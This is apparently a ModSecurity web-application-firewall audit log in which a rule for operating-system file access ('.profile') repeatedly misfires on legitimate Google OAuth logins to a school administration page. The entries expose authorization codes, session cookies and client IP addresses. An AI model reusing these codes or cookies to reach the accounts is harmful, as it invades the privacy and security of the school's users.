"www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIG-IVooLYw4or2LgWK0YAAAANc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753333281057038 424845 (- - -) Stopwatch2: 1753333281057038 424845; combined=4431, p1=569, p2=3555, p3=131, p4=61, p5=115, sr=147, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5268ed29-Z-- --acbfdb1d-A-- [24/Jul/2025:08:02:45.310587 +0300] aIG-dFooLYw4or2LgWK3IQAAANA 212.28.242.186 56024 127.0.0.1 7081 --acbfdb1d-B-- GET /administration/index.php?code=4/0AVMBsJj61p5oroq1yUGA8m38Sd3Gd_DQMLZYwb6Hj1urGMVmzWYSUgXsWyjaErDj8NkBYg&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 212.28.242.186 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: ar-LB,ar;q=0.9,en-LB;q=0.8,en;q=0.7,en-US;q=0.6 priority: u=0, i cookie: PHPSESSID=tull8t6h7upgkrvn3f0a3fovd7 --acbfdb1d-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --acbfdb1d-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIG-dFooLYw4or2LgWK3IQAAANA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753333364895721 415067 (- - -) Stopwatch2: 1753333364895721 415067; combined=4255, p1=532, p2=3347, p3=178, p4=63, p5=134, sr=161, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --acbfdb1d-Z-- --32e89264-A-- [24/Jul/2025:08:03:41.835739 +0300] aIG-rVooLYw4or2LgWK4KwAAAMk 141.105.87.197 60530 127.0.0.1 7081 --32e89264-B-- GET /administration/index.php?code=4/0AVMBsJjsh3AjfzSkF6HRQvqbjO0fN0VYcAMSYtNoHEz1nvArW4HHiz70j57e6ymfbVo7-w&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 141.105.87.197 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=p69scg0q2tvstvgi27t4bjrs36 --32e89264-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --32e89264-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIG-rVooLYw4or2LgWK4KwAAAMk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753333421414859 421202 (- - -) Stopwatch2: 1753333421414859 421202; combined=6837, p1=549, p2=5867, p3=179, p4=61, p5=181, sr=147, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --32e89264-Z-- --f2202846-A-- [24/Jul/2025:08:08:13.189578 +0300] aIG_vEdutIOpb_kg22gOXQAAABQ 212.28.242.186 52702 127.0.0.1 7081 --f2202846-B-- GET /administration/index.php?code=4/0AVMBsJi8U7P8CwExadHQQZo9USUoApAWT4O33-7xvdiOhPYc3Bo7P5zd_KkX_Yk5K_SJmg&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 212.28.242.186 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=em42krphtbjd4lcfe3ctjcsg61 --f2202846-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --f2202846-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIG_vEdutIOpb_kg22gOXQAAABQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753333692791063 398715 (- - -) Stopwatch2: 1753333692791063 398715; combined=5156, p1=642, p2=4132, p3=162, p4=74, p5=146, sr=175, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f2202846-Z-- --b5237324-A-- [24/Jul/2025:08:10:09.679212 +0300] aIHAMFooLYw4or2LgWLEqQAAANM 141.105.87.197 33096 127.0.0.1 7081 --b5237324-B-- GET /administration/index.php?code=4/0AVMBsJhjEde9m4WyKWgg5Wuk-eVfofuWDfQrEmYWQw24ZzQ-iS-vH-T14Ymlh1I_AVpLLQ&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 141.105.87.197 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0 accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 accept-language: en-US,en;q=0.5 accept-encoding: gzip, deflate, br, zstd referer: https://accounts.google.com/ upgrade-insecure-requests: 1 sec-fetch-dest: document sec-fetch-mode: navigate sec-fetch-site: cross-site sec-fetch-user: ?1 priority: u=0, i cookie: PHPSESSID=3r2jh4bn825hjn7g3q1dlr3r02 --b5237324-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --b5237324-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHAMFooLYw4or2LgWLEqQAAANM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753333808591346 1088131 (- - -) Stopwatch2: 1753333808591346 1088131; combined=5352, p1=675, p2=4335, p3=164, p4=53, p5=125, sr=182, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b5237324-Z-- --c502a762-A-- [24/Jul/2025:08:13:01.914984 +0300] aIHA3UdutIOpb_kg22gT1wAAABU 195.112.198.68 39714 127.0.0.1 7081 --c502a762-B-- GET /administration/index.php?code=4/0AVMBsJgkftb_L5tR4eGsoH6TgVjyZv1goM2XV6Q5-13UhTfO0aSDnA4CA_HQl9PrChA6sQ&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 195.112.198.68 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=qhqfl67fhcio8kki3b8kk94cq7 --c502a762-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --c502a762-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHA3UdutIOpb_kg22gT1wAAABU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753333981494068 421203 (- - -) Stopwatch2: 1753333981494068 421203; combined=4839, p1=506, p2=3823, p3=143, p4=197, p5=170, sr=136, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c502a762-Z-- --b9865022-A-- [24/Jul/2025:08:13:44.475350 +0300] aIHBCFooLYw4or2LgWLMRQAAAMg 141.105.87.197 47276 127.0.0.1 7081 --b9865022-B-- GET /administration/index.php?code=4/0AVMBsJgCjlgraUhwVoFzi148ttO7k3A2xHrXnl3aBw98VHYULMWWFmWCNIfSEtTWwWzjRw&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 141.105.87.197 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 accept-language: en-US,en;q=0.5 accept-encoding: gzip, deflate, br referer: https://accounts.google.com/ upgrade-insecure-requests: 1 sec-fetch-dest: document sec-fetch-mode: navigate sec-fetch-site: cross-site sec-fetch-user: ?1 cookie: PHPSESSID=koe7okb9i9d8u01kick9br9md3 --b9865022-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --b9865022-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHBCFooLYw4or2LgWLMRQAAAMg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753334024054997 420535 (- - -) Stopwatch2: 1753334024054997 420535; combined=6389, p1=885, p2=5011, p3=227, p4=94, p5=171, sr=288, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b9865022-Z-- --d192e404-A-- [24/Jul/2025:08:14:38.746828 +0300] aIHBPkdutIOpb_kg22gVkAAAAA0 212.28.242.186 60332 127.0.0.1 7081 --d192e404-B-- GET /administration/index.php?code=4/0AVMBsJi2-YJW08yCKp5u2BoTTE93j9fTCL-I-Ks8k5DBT1l-75xcl0q04EikPqWldCRmCw&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 212.28.242.186 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-GB,en-US;q=0.9,en;q=0.8 priority: u=0, i cookie: PHPSESSID=n1bge5fhsbkvhbirek697od403 --d192e404-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --d192e404-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHBPkdutIOpb_kg22gVkAAAAA0"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753334078299066 447959 (- - -) Stopwatch2: 1753334078299066 447959; combined=4541, p1=574, p2=3645, p3=99, p4=88, p5=134, sr=143, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d192e404-Z-- --61e4b06f-A-- [24/Jul/2025:08:15:05.637955 +0300] aIHBWVooLYw4or2LgWLO_QAAAMM 141.105.87.197 48580 127.0.0.1 7081 --61e4b06f-B-- GET /administration/index.php?code=4/0AVMBsJhMO7CkEtfRUJjmmc85-86xNRex19ARB8VM4CxH7oBNGtP04BfrqoN1Fv4CUobbaQ&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 141.105.87.197 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=0cks2agr4hamlumcv2616npn63 --61e4b06f-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --61e4b06f-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] 